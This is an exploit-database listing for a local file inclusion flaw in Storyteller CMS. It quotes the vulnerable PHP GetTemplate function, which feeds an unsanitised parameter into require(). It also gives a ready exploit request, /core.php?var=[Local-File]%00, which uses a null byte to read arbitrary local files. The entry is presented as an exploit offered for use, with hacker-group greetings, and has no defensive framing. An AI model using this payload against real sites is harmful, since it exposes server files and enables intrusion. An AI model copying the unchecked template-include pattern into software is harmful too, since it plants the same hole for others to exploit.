[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Storyteller CMS (var) Local File Inclusion Vulnerability

Author
BorN To K!LL
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-14071
Category
web applications
Date add
14-09-2010
Platform
php
========================================================
Storyteller CMS (var) Local File Inclusion Vulnerability
========================================================

==
[~] Title: Storyteller CMS (var) Local File Include Vuln
[~] Version: n/a
[~] Link: http://www.esselbach.com/freeware.php?id=2
==
[~] Author: BorN To K!LL - h4ck3r
[~] Contact: SQL@hotmail.co.uk
==
[~] Vuln code:
in GetTemplate function , line 113 to 127
 
    function GetTemplate($var)
    {              
        if (file_exists("templates/$var.tmp.php"))
        {
            require("templates/$var.tmp.php");
        }
        else
        {
            die ("Error: Can't open template $var");
        }       
        return $EST_TEMPLATE;                
    }
 
[~] 3xploit:
/core.php?var=[Local-File]%00
==
[#] Greetings:
 
Dr.2 , darkc0de team , inj3ct0r's Community , and all ma friends ,,
==



#  0day.today [2024-12-23]  #